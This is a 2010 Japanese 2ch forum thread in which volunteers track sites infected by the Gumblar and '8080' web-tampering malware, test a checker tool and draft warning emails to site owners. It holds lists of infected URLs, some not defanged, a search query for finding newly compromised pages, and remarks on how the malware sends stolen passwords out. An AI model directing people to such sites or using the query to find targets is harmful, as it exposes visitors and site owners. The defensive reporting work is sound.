364 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 10:57:38 BE:8803878-2BP(1236)]: >>361
210.172.138.224
GMOにつーほー
365 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 11:54:03 ]: Gumblar Checker 3で、
試験的に/*CODE1*/,/*LGPL*/,DEBUG(megaid固定)に対応しました。

gumblar.s1.dynamitelife.net/ver3/
366 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 12:09:57 ]: >>365
乙
367 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 12:14:01 ]: >>365
本当にいつも乙です。
368 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 13:33:37 ]: /*GNU GPL*/,/*handle exception*/,DEBUG改,/*Exception*/のコードに対応しました。

gumblar.s1.dynamitelife.net/ver3/
369 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 13:36:54 ]: チェッカーは、３だけ使えばいいのかな？
370 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 13:44:10 ]: >>368
janeのコマンドに登録したいんだけど、以下でおｋですか？
Gumblar Checker 3=gumblar.s1.dynamitelife.net/ver3/result.php?url=$LINK
371 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 13:56:10 ]: >>370
大丈夫です
372 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 14:05:46 ]: >>371
これｔってオリジナルのスクリプトのコードは表示できないの？
それを検体として送りたいので。
今は飛び先のチェックで抽出してるけど。
373 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 14:12:20 ]: >>371
これってコード表示できないの？
374 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 14:13:16 ]: >>372
なるほど、もしかしたら誤検出する対策ソフト出るかもしれませんが実験してみます。
少々お待ちください
375 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 14:14:25 ]: >>370-371　自演ワロタｗ
376 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 14:29:17 ]: >>374
一部表示を全角にするとか
377 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 14:52:04 ]: コード表示させるようにしてみました
改行処理は面倒なのでしてませんが・・・
378 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 14:56:31 ]: VirusTotalでチェックした所一部誤検出する対策ソフトがあったので一回停止します
379 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 15:06:42 ]: 日本語ドメインにも対応してほしいです。
puniに変換するのめんど(ry
380 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 15:07:35 ]: まんま表示させたら駄目だろｗｗｗ
381 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 15:59:46 ]: ■ 感染確認・駆除ツール
アンラボ(v3daonol.exe)
ttp://www.ahnlab.co.jp/download/vdn_list.asp
マカフィー(stinger.exe)
ttp://www.mcafee.com/japan/mcafee/support/announcement20091127.asp
Kaspersky(KatesKiller.exe)
ttp://support.kaspersky.com/faq/?qid=208280701

Microsoft、trendmicro、McAfee・・・全部表示出来ないんだけどどうすれば良いですか？
Microsoft Updateもupdate出来ないし、オワタ？
382 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 16:09:06 ]: Gumblar Checker 3の作者さん。
Gumblar.X Checkerもそうだけど、アドレス入力ボックスにあらかじめ入力されている http:// が
IE以外では意味ないのは仕様ですか？
383 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 16:16:44 ]: >>379
今から組み込んでみます。少々お待ちください。

>>382
仕様ですがやっぱりアレなので変更しました。
384 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 16:37:22 ]: 日本語ドメインなんて使ってるやついるんだな
385 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 18:06:20 ]: ごめんなさい、一応組み込んだんですが、今使用しているレン鯖が日本語ドメインをPunycodeに変換するモジュールが入ってないみたいなので対応できませんでした。
386 名前：379 mailto:sage [2010/02/13(土) 18:23:05 ]: >>385
わざわざありがとうございます。
とりあえず自分で変換して使ってみます。
387 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 18:47:41 ]: >>385
送信前にJavaScriptで変換汁
388 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 18:54:41 ]: www●bamu7●com
www●camu7●com
www●eamu7●com
www●famu7●com
www●gamu7●com

こんなSEO目的の屑サイトが事態を悪くしている
389 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 19:01:49 ]: >>388
8080？
390 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 19:12:25 ]: www.aguse.jp/とwww.gred.jp/ってどっちが判定正しいんだ?

ここの以外でも確かめてみたくて
391 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 19:24:16 ]: 断然　aguse
392 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 19:25:54 ]: >>387
おお、その手がありましたね。
ということで日本語ドメインに対応しました。日本語JPドメインを入れて「チェックする」ボタンを押すと勝手にPunycodeに変換してチェックします。
Enterキーでやると動作しません。

gumblar.s1.dynamitelife.net/ver3/
393 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 19:32:47 ]: 自前のgredよりカスペ頼りのaguseの方が優秀とは皮肉な
394 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 19:34:37 ]: 頼むぜ
395 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 19:34:55 ]: >>388の
www●camu7●comにある8080系コードに対応しました。
gumblar.s1.dynamitelife.net/ver3/
396 名前：へたれ発掘屋 mailto:sage [2010/02/13(土) 20:13:06 ]: 陥落さいと(最新型)釣れすぎwww
【びんぐ】
検索わーど："var" "if(" ";var" "window" ".replace(/[" ";this."
ttp://www.bing.com/search?q=%22var%22+%22if%28%22+%22%3Bvar%22+%22window%22+%22.replace%28%2F%5B%22+%22%3Bthis.%22&go=&form=QBRE3

---

MILLION PIXELS [WebDesign/DTP/Sound Production]
tp://www●millionpixels●com/webdesign/index●html
陥落サイトをデザインしてるとですか？
397 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 20:16:13 ]: >>395
index.phpが何故か消えてたので再アップしました
398 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 20:20:16 ]: >>397
パスワードが割れてる予感
鯖管の悪戯か？
399 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 20:21:48 ]: こえーよ
大丈夫かよ
チェッカーでウイルス掛かるとかまじやだ・・
400 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 20:22:33 ]: 鯖のアンチウイルスが消したとか？
401 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 20:28:37 ]: 八苦されるようなチェッカーを作る奴は信用できない
402 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 20:37:00 ]: レジストリチェックしましたが感染してないっぽです。
転送量や負荷をかけていると予告無しで消される、と規約にあるけどそれなのかな。
ファイルはすべてチェックしましたが感染しているとこはありませんでした。
次回も起きるようだったら鯖移転しようと思います。

>>400
もしかしたらそれかもしれないですね。
403 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 20:49:02 ]: 移転したほうがいいよ
404 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 20:50:29 ]: うーん、もしかしたら鯖が暴走してるっぽい？
405 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 20:54:41 ]: 鯖が意思を持ち始めた
スカイネットの誕生である
406 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 21:04:47 ]: HAL2010
407 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 21:07:15 ]: 人生、宇宙、すべての答えは？
408 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 21:07:22 ]: 42
409 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 21:09:59 ]: 23
410 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 21:13:12 ]: 分かる人向けのネタ多すぎww
411 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 21:15:16 ]: 全然わからんなｗ
関係ないけど死んだら14に行くって事はちゃんと知ってる
412 名前：名無しさん＠お腹いっぱい。 [2010/02/13(土) 21:18:57 ]: www●tanpopo-clinic●jp
カスペが反応しないけど改ざんされている
413 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 21:24:34 ]: チェッカーだと検出するね
414 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 21:25:55 ]: >>412
されてます
www.virustotal.com/jp/analisis/06b163640fb724f89e4451e2ad226008cbe1c8b58c4dfb9282f2291f2f2cc327-1266063864
415 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:06:18 ]: いちおうこっちのチェッカーも新しめのやつ検出できてるみたいです
ec2-204-236-148-61.us-west-1.compute.amazonaws.com/
416 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:09:59 ]: >>415
大丈夫っぽいな

でも誰のサービスだ?
417 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:12:13 ]: ここブロックされたけどなんかあります？
ttp://www.f.kpu-m.ac.jp/k/dgstv-surg/index2.html
418 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:17:43 ]: >>417
Decryptor Generic (GJS063)感染
京都府立医科大学ねぇ～
419 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:18:51 ]: >>417
それと、URLはh抜きだけじゃ危ない
.を●にしれ
420 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:30:41 ]: 2009年第1回駿台全国模試理系学部合格目標ライン　前期日程国語補正済み

80　●東京大理Ⅲ
79
78　●京都大医
77
76　
75　●大阪大医
74
73　東京医科歯科大医　←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←
72　●東北大医　千葉大医　●九州大医　●名古屋大医
71
70　京都府立医科大医　★東京大理Ⅰ
69　●北海道大医　★東京大理Ⅱ
68　神戸大医　岡山大医　横浜市立大医　名古屋市立大医　大阪市立大医　
67　新潟大医　金沢大医　滋賀医科大医　広島大医　熊本大医　奈良県立医科大医　★京都大薬
66　三重大医　長崎大医　札幌医科大医 ★京都大理
65　群馬大医　浜松医科大医　山口大医　愛媛大医　和歌山県立医科大医　北海道大獣医　★京都大物理工
64　富山大医　福井大医　岐阜大医　徳島大医　鹿児島大医　　
63　弘前大医　山形大医　山梨大医　信州大医　大分大医　九州大生命科学　★京都大農
62　旭川医科大医　秋田大医　香川大医　琉球大医　福島県立医科大医　
61　大阪大薬　東京農工大獣医　
60　鳥取大医　佐賀大医　宮崎大医　東京医科歯科大歯　大阪大歯　帯広畜産獣医
421 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:33:16 ]: 矢印どうにかしてから貼れよ
422 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:33:40 ]: >>417
www●f.kpu-m●ac●jp/k/dgstv-surg/index.html が感染
ttp://www.virustotal.com/jp/analisis/7c5c4c5cdfe3d95c6190f97cea641d6d49ada24201ac2948e88f16753f6086a3-1266067798
423 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:36:00 ]: ところで感染するとどうなるんだい？
424 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:38:17 ]: どっちが？
425 名前：418 mailto:sage [2010/02/13(土) 22:39:43 ]: とりあえず大学だから連絡しておいた。
426 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 22:41:47 ]: 91●201●28●53/ztr/index.php?s=7a38815ea3cb6bf17d728f1d256da477
に飛ばされた
その先はシラネ
427 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/13(土) 23:57:07 BE:943823-2BP(1236)]: >>388,>>396
でじろ

>>412
whoisからめるぽしました。

>>425
乙です乙です。
428 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 00:23:52 ]: サクラとかロリポップは連絡先がわかりやすいんだけど
デジロックとかOCNってどこから通報したらいいんだ？
429 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 00:28:41 ]: www.tanpopo-clinic.jp
ここって感染してる？
踏んでしまったんだが
430 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 00:29:52 ]: >429
なんで直接貼るの？
431 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 00:30:23 ]: クソバカが！直リンするなって書いてあるだろうが！テンプレよく見ろクズ虫！
432 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 00:33:10 ]: わざとだろ
433 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 00:34:16 ]: h抜いてすらいないし
434 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 01:00:29 ]: >>429
>>412 >>414
435 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 01:32:22 BE:2830829-2BP(1236)]: >>428

でじろ
www.digirock.jp/ -> www.digirock.jp/contacts.html

おしん
www.ocn.ne.jp/info/rules/abuse/
help.ocn.ne.jp/ocn/bot/faq.html#q1-5

さくら
https://secure.sakura.ad.jp/notify/form/abuse.phtml

ろりぽ
https://lolipop.jp/support/inq/
436 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 01:43:04 ]: なんかどれも萌えキャラの名前みたいに見える
437 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 06:16:29 ]: >>224
quake_vnb●rshu●ru/index_eng●html
再発
438 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 09:44:22 ]: kasori●seikei-kai●or●jp
439 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 09:51:23 ]: >>437
対応しました。
gumblar.s1.dynamitelife.net/
440 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 09:54:54 ]: >>439
URLミスです。
gumblar.s1.dynamitelife.net/→gumblar.s1.dynamitelife.net/ver3/
441 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 10:17:03 ]: www●shisetsu-sc●co●jp/
442 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 11:05:35 ]: >>437のソースが取得できないね
443 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 11:28:55 ]: ちょっと前まで感染するとbase64で変換してPOSTでパスワード上げてたのに
最近は圧縮してんな、POSTで上げたり、SMTPで送ったりいろいろやってし。
だいぶ複雑になって来た。

俺と同じXPSP3使ってる奴は
最新のウィルス実行するとソフト全部最新にしても死ぬから気を付けろ。
まず実行されることはないと思うけど。
444 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 11:33:42 ]: >>443
な・・・ん・・・だと・・・!?
XPSP3だと対策は現状無意味とでも言うのか?

これは7買えって言う事なのか・・・金ねぇよ・・・・・・
445 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 11:39:39 ]: >>443
どういう事なの・・。
感染したサイト行ったりしたけど今のところ何の問題も無いぞ・・。
446 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 11:43:16 ]: >>444
avast付けてここに出てるURL全部踏んでるけど
実行される前に止まってるから感染しない。
普通にやってる限りは止まってくれるんじゃないか？
すげぇー適当だけど。
447 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 11:55:43 ]: >>446
いや、それで普通だからｗ
実行ファイルの実行場所がキャッシュやtempで、且つ明示的に実行した場合は
感染を防ぐのが難しいだけ
448 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 12:33:47 ]: >>443
> 最新のウィルス実行すると

実行する前提ならソフトが最新かどうかなんて関係ないだろｗ
素人？
449 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 12:34:44 ]: 法政大学社会学部（旧公式サイト）
おそらく公式サイト移行で管理放棄されたサイト

ttp://soc●jpn●org/soc02
ttp://soc●jpn●org/soc03
ttp://soc●jpn●org/soc04
ttp://soc●jpn●org/soc05
以下略
450 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 12:36:48 ]: >>448
もしかしてアホ？
451 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 12:38:27 ]: ＝＝＝＝＝＝＝＝＝＝ここまで俺の自作自演＝＝＝＝＝＝＝＝＝＝
452 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 12:41:44 ]: 最近定義ファイルよりもヒューリスティックでブロックするケースが多くなってきた。

セキュリティソフト2本併走中
（定義2本　ヒューリスティック2本）
453 名前：へたれ発掘屋 mailto:sage [2010/02/14(日) 12:44:56 ]: 既出ご容赦＆上の階層は調べてないのです(多すぎるから)

tp://www●hondasanken●com/
tp://www●palmjp●com/index5●html
tp://whitetiger●sakura●ne●jp ←大量装填中(笑)
tp://bobobo●boom-k●com/poor-athlete-japan
tp://www.goldlane●co●jp/utsunomiya/guide/index●html ←前科多数
tp://www●damu7●com/kaisiha
tp://www●hondasanken●com/newhonda/rofty
tp://soc●jpn●org/soc05/kyouju/kinter
tp://www●shisetsu-sc●co●jp/c/cat23/01-4/cat29
tp://ai●hotel-saint-paul-saint-germain-paris●com/nomuikumou
tp://viennaoptimist●org

つーほー＆検体提出ヨロ。発掘作業に戻る......
454 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 12:45:47 ]: Gumblar Checker 3で、8080系と判定されたコードを表示するようにしました。
誤検出対策のため、以下の文字を全角にしています。
( → （　　　　　　) → ）　　　　　　/ → ／
「コードを表示」というボタンを押すと、コードが出るようになります。

gumblar.s1.dynamitelife.net/ver3/
455 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 13:20:30 ]: >>453
tp://soc●jpn●org/soc05/kyouju/kinter
tp://viennaoptimist●org

にあるタイプに対応しました。
gumblar.s1.dynamitelife.net/ver3/
456 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 13:29:32 ]: tp://soc●jpn●org/soc05/kyouju/kinter
のタイプの復合に失敗していたので修正しました。
コードが無いページでも「コードを表示」ボタンが出る不具合を修正しました。

gumblar.s1.dynamitelife.net/ver3/
457 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 13:34:04 ]: >>449
それは法政大学社会学部公式サイトで今まで掲載された物を年度別に仕分けたページと思われる
上記公式サイト上からリンク有り
458 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 13:38:35 ]: とにかく、どのＨＰもここんこチェッカーを通してからじゃないと
アクセスできねぇよ。なんだよこの不安感。ブラスターで
攻撃されまくってた９８時代を思い出す。ハンパネェ。
459 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 14:24:32 ]: ブラスターなのに98？？？
460 名前：へたれ発掘屋 mailto:sage [2010/02/14(日) 14:34:48 ]: >>456
乙です。
--
朝日オート(再再再再再再再再再再再再再再再再再再再再再･･･改竄)
tp://sunrise●2pg●in/

( ﾟДﾟ) 

カスサイトは消滅してほしいのです･･･
461 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 14:46:39 ]: >>460
ひでーな…もう行政指導か何かでもしないと直らないんじゃないか？
まあ行政指導する側もあんまり理解してなさそうだが
462 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 14:47:27 ]: だれか通報連絡メールのテンプレ作って。

自分の文章じゃ相手に分かってもらえないような気がしてきた…

自分の↓
---------------------
こんにちは

こちらのサイトを閲覧していたのですが、（タイトル）のページ（URL）に不審な動きがみられました。
おそらく（8080 or Gumblar）系のウイルスに感染していると思われます。

最近は、改ざん系のウイルスが流行しているので、念のため確認していただこうと思いメール差し上げました。
参考までにIPAの解説サイトです。
www.ipa.go.jp/security/topics/20091224.html

また、次のサービスでチェックすることができます。
www.aguse.jp/　www.gred.jp/

こちらの勘違いであれば申し訳ございません。
それでは、失礼しました。
463 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 14:51:08 ]: >>462
ソネットセキュリティのアドレスも書いた方がよくね？
464 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 14:52:41 ]: とりあえずさくらたんとサイトの管理人にメールした。
whitetiger。sakura。ne。jp
465 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 14:54:48 ]: gredもaguseも最近発見率が下がってる気がするのは俺だけか
466 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 15:00:28 ]: こんな内容で送ってます～。
感染している方々はPCに疎いことが考えられるんでチェックサービスでカスペルスキーなんて出たら「駆除済み」と思われかねないかと。

突然のメール失礼いたします。
わたくし●●と申します。

2010/2/13 21:00現在
貴サイトにおいて
「ガンブラー攻撃」に分類される疑いのあるスクリプト（HP用の命令文）を確認いたしております。
アクセス時はご注意ください
「　****.**.**　」

●以下のことが考えられます。
ホームページ管理を行っているパソコンがウイルスに感染。
（外注している場合、同一PCで製作している複数のホームページへ感染）
個人情報がインターネット上に流出している。
ホームページ訪問者への感染拡大。
至急対策を講じられますことをお奨めいたします。
●対策（可及的すみやかに）
①パソコンからのウイルス駆除
②Windowsなどのソフトウエアの更新
③セキュリティソフトの導入
④ホームページパスワードの変更
⑤ウイルス感染告知の掲載＆ホームページからのスクリプト除去（クリーニング）
ご自身で対応できない場合、【絶対に放置せず】詳しい方に対応してもらってください。
尚、既に対応済みであった場合はご容赦ください。
467 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 15:01:39 ]: >>460
tp://s1●shard●jp/dreaming/mitubishiucar/index●html
こっちは気付いてないのかしらん
468 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 15:04:40 ]: >>465
アグセ（ウエブのほう）は検出しなくても下部リンクに赤字でスクリプト記載がでますよ
亜種が多くてパターンファイル頼みじゃ限界の予感
469 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 15:06:29 ]: >>467
Gumblar Checker 3で対応しました。
470 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 15:08:44 ]: 通報した人って返信メールとかお礼的なメールってもらって事ありますか？
連絡してもさっぱりどういう対応なのか分からない・・・
471 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 15:14:54 ]: >>470
表示に問題ありませんでしたぁ～(笑)
だいじょうぶですぅ～

っていうアフェなのが来たことがあった。　
その後鯖屋の手によって封鎖されたんだが…
472 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 15:30:01 ]: bukatsu。 com
駆除されたっぽいね。
www.eishinyobikou。　com/
473 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 15:32:28 ]: >>472
やめろや
ちゃんとルール守ろうね

ママのおっぱいでも吸っとけば？
474 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 15:38:42 ]: >>435

デジロの通報ってこっちだよね？
https://www.value-domain.com/webabuse.php\\\
475 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 15:41:47 ]: なんか法政大学に繋がるメールアドレスが見当たらないんだが・・・これは連絡は電話だけに限るってか・・・?
whoisにも連絡出来るようなｱﾄﾞﾚｽ無いし・・・
476 名前：へたれ発掘屋 mailto:sage [2010/02/14(日) 15:44:41 ]: >>467
スマソ･･･orz

トップページもオワタ
tp://s1●shard●jp/dreaming/
477 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 15:52:17 ]: >>475
IPドメインサーチで担当者情報を検索
478 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 15:55:47 ]: >>475
iwatsuki at k.hosei.ac.jp
479 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 16:04:20 BE:4401874-2BP(1236)]: 今北

>>474
そちらでよさそうですね。
>>435にはメアドがあるのでめるぽに使ってました。

>>438
めるぽしました。
480 名前：472 mailto:sage [2010/02/14(日) 16:10:28 ]: >>473
おまえさんのブラウザはスペースが入っててもリンクになるのかｗ

http //www.damu7●com/kaisiha/
デジロにも通報した
481 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 16:12:34 ]: まぁ誤記防ぐような機能でURLにスペースあっても無視して繋げるようなブラウザは有ったようなないような
482 名前：472 mailto:sage [2010/02/14(日) 16:14:11 ]: そうなのか…

だったらｽﾏｿ
483 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 16:45:35 ]: FC2から注意しろってめーるが来た
484 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 16:53:12 ]: めるぼしました
485 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 17:22:21 ]: www.tanpopo-clinic●jp
直った？
486 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 17:24:14 BE:8489096-2BP(1236)]: >>441
ttp://whois.domaintools.com/shisetsu-sc.co.jp
ttp://whois.nic.ad.jp/cgi-bin/whois_gw?key=202.211.43.88
whoisからめるぽしました。

落ちまふ。ﾉｼ
487 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 17:24:25 ]: このスレだけで３回は見たわ
488 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 17:39:17 ]: >>485
中途半端なことするなボケ
489 名前：名無しさん＠お腹いっぱい。 [2010/02/14(日) 19:04:05 ]: akrapovic●sakura●ne●jp/m06/
akrapovic●sakura●ne●jp/m08/
akrapovic●sakura●ne●jp/mr02/
akrapovic●sakura●ne●jp/mr07/
cocoro-dhp●sakura●ne●jp/
490 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 19:07:24 ]: >>489
一番下は違うだろ
491 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 19:08:28 ]: >>489

cocoro-dhp激しいなこれ・・・
何が混ざってるかもうわかんない＞＜；
492 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 19:26:38 ]: xn--oyr98sizl●xn--n8jmt0y●jp/index.html
493 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 19:38:38 ]: aguseってJavaScriptを有効にしないと使えないのかよ。
一応対策としてJavaScript切ってんのに
494 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 19:53:43 ]: <script>function～は暫く前からあったぞ

↓危険！　アクセス注意！↓
tp://www●asianmotors●co●in/
CODE1が突っ込まれた直後から時間が止まってる(再改竄されてない)

※アクセス規制でGoogleに飛ばされる時は
ttp://end.if.land.to/geno.php?mode=nobold&url=
こっちのチェッカーを使えばソースが見れるはず
495 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 20:17:53 ]: まだ作った奴捕まってないのか？
496 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 20:20:53 ]: www.stardustpictures●co●jp/wasureai/
ここって感染してる？
497 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 20:24:17 ]: >>496
中途半端なんじゃボケ
氏ね
498 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 20:26:45 ]: >>496
8080系
499 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 20:36:36 ]: >>496
大きな会社だから通報しますた
あの芸能事務所系だし…
500 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 20:40:40 ]: >>499
小さい会社なら通報しないんか
うぜーなそういう奴
どんな性格がだいたいわかるわ
501 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 20:46:37 ]: (ｷﾘｯ
502 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 20:48:58 ]: 自分は何もしないくせに文句だけ言うんか
うぜーなそういう奴
どんな性格がだいたいわかるわ
503 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 21:04:35 ]: 今日は食が進むわ
504 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 21:14:04 ]: チキンうめｗｗｗｗ
505 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 21:40:59 ]: チキン・・・・・・？
チョコは？
506 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 21:55:42 ]: チョコ？
そんなもん金曜日に全部食べたわ
今年は8個
まぁまぁかな
507 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:11:20 ]: ***.249.123.1**様、***.97.205.1**様、***.200.38.**様、***.48.184.1**様
***.231.203.23*様、***.126.173.3*様、***.236.78.15*様、**.244.194.8*様
***.110.16.9*様、***.128.191.5*様、**.62.192.19*様
危険な中確かめに来ていただいてありがとうございました。

メールをくださった方、この度は連絡していただいてありがとうございました。

本当ならば、おひとりづつお礼のメールを差し上げたいのですが、
すでに連絡の取れなくなっているアドレス（捨てアド?）から送っていただいた方が
多いのでこちらでまとめて書かせていただきます。

一つだけ質問があるのですが、>>492様はどちらでこのページを見つけたのですか？
身内向けのページなので検索避けしてあったのですが…
508 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/02/14(日) 23:19:04 ]: >>507
ここに一部伏せたとはいえIP書くと脅してるみたい
509 名前：507 mailto:sage [2010/02/14(日) 23:21:52 ]: >>508
そうなんですか！？
２チャンネルはよくわからなくて…

こちらもメールで教えていただいたんです。
